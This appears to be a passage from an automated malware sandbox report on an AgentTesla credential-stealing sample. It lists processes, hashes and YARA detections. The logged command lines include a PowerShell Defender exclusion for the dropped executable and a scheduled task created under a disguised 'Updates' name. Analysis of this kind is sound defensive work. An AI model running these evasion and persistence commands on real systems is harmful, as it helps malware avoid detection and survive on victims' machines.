Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 5
Start time: 12:23:35
Start date: 05/08/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
Imagebase: 0xf10000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 6
Start time: 12:23:35
Start date: 05/08/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6406f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 7
Start time: 12:23:36
Start date: 05/08/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
Imagebase: 0x30000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 9
Start time: 12:23:37
Start date: 05/08/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6406f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 10
Start time: 12:23:40
Start date: 05/08/2022
Path: C:\Users\user\Desktop\wKQpOZ58Gl.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\wKQpOZ58Gl.exe
Imagebase: 0x170000
File size: 801280 bytes
MD5 hash: F7C9CF1410373A60A5C5A5E02AA4BD3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 14
Start time: 12:23:45
Start date: 05/08/2022
Path: C:\Users\user\Desktop\wKQpOZ58Gl.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\wKQpOZ58Gl.exe
Imagebase: 0x4a0000
File size: 801280 bytes
MD5 hash: F7C9CF1410373A60A5C5A5E02AA4BD3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

                                                    No disassembly